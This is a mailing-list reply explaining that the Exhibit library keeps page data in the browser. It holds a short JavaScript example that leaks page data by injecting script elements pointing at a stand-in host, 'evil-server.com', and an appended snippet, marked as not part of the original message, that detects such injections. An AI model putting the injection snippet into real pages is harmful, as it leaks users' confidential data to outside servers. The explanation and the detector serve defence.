Hi Mark,

That's a good question.

The quick answer is: absolutely No. Only code gets transferred from our 
server to the browser of whoever is viewing your web page. There, the 
code acts on your data entirely inside the browser to generate the 
rendering.


To be clear, _any_ foreign code you include into your web page can act 
as a trojan horse, sending your data off regardless of whether your web 
page is protected by https:// or http://127.0.0.1/ or file:///. The 
trick is extremely simple: the code keeps injecting <script> elements or 
<img> elements into your web page's DOM dynamically to send off your 
data bit by bit, e.g.,

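    // Build a <script> element whose URL carries the data in its query string
    var script = document.createElement("script");
    script.src = "http://evil-server.com/data-collector/?data=" + somePieceOfYourData;
    // Appending it to the DOM makes the browser issue the request
    document.body.appendChild(script);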

Exhibit does _not_ send your data off anywhere else, using this trick or 
any other trick.


However, if your web page links to the script on our server, then our 
server automatically logs your domain name / IP address (as a referrer). 
This is a common behavior. The consequence of this behavior is 
interesting--perhaps Stefano will jump in and discuss it here.

If you want absolutely no trace whatsoever of your use of Exhibit, then 
you need to download the source code and change it a little. Email me 
separately about this.

Hope that's clear,

David

Mark Gadsby wrote:
>
> Hi,
>
> I have a quick question re: using Exhibit with confidential/proprietary 
> data. Please forgive my ignorance if this is an obvious question.
>
> If I use Exhibit to display confidential data, is that data transferred 
> to MIT as part of the rendering of the page? I realise that to people 
> who understand web services this may be a stupid question.
>
> Many thanks,
>
> Mark
> ---
>
> This e-mail may contain confidential and/or privileged information. If you
> are not the intended recipient (or have received this e-mail in error)
> please notify the sender immediately and destroy this e-mail. Any
> unauthorized copying, disclosure or distribution of the material in this
> e-mail is strictly forbidden.
> ------------------------------------------------------------------------
>
> _______________________________________________
> General mailing list
> [email protected]
> http://simile.mit.edu/mailman/listinfo/general
>   
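
A way to watch for the injection trick David describes, as an added example that is not part of the original message or of Exhibit's code: it flags `<script>` and `<img>` elements added to the DOM whose `src` points outside an explicit allowlist of origins. The allowlist, the function names and the `.example` hosts are assumptions made for illustration.

```javascript
// Added example (not Exhibit code). ALLOWED_ORIGINS is a hypothetical allowlist;
// replace it with the origins your page is expected to load from.
const ALLOWED_ORIGINS = new Set(["https://intranet.example"]);

// Resolve a src against the page URL; return null if it cannot be parsed.
function resolve(src, pageUrl) {
  try { return new URL(src, pageUrl); } catch (e) { return null; }
}

// Pure check: given {tagName, src} records, return those that would send a
// request to a non-allowlisted origin, with the size of the query string.
function findForeignLoads(nodes, pageUrl, allowed = ALLOWED_ORIGINS) {
  const findings = [];
  for (const n of nodes) {
    const tag = String(n.tagName || "").toUpperCase();
    if ((tag !== "SCRIPT" && tag !== "IMG") || !n.src) continue;
    const url = resolve(n.src, pageUrl);
    // data:, blob: and file: sources make no request to a remote server
    if (!url || !/^https?:$/.test(url.protocol)) continue;
    if (allowed.has(url.origin)) continue;
    findings.push({ tag, origin: url.origin, queryBytes: url.search.length });
  }
  return findings;
}

// Browser wiring: report foreign script/img loads added after page load,
// including elements whose src is set after they were inserted.
if (typeof MutationObserver !== "undefined") {
  new MutationObserver((records) => {
    const nodes = records.flatMap((r) =>
      r.type === "attributes" ? [r.target] : Array.from(r.addedNodes));
    for (const f of findForeignLoads(nodes, location.href)) {
      console.warn("foreign load injected:", f.tag, f.origin, f.queryBytes);
    }
  }).observe(document.documentElement, {
    childList: true, subtree: true, attributes: true, attributeFilter: ["src"],
  });
}
```

This only reports the loads; a Content-Security-Policy with restrictive `script-src` and `img-src` directives makes the browser refuse them.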
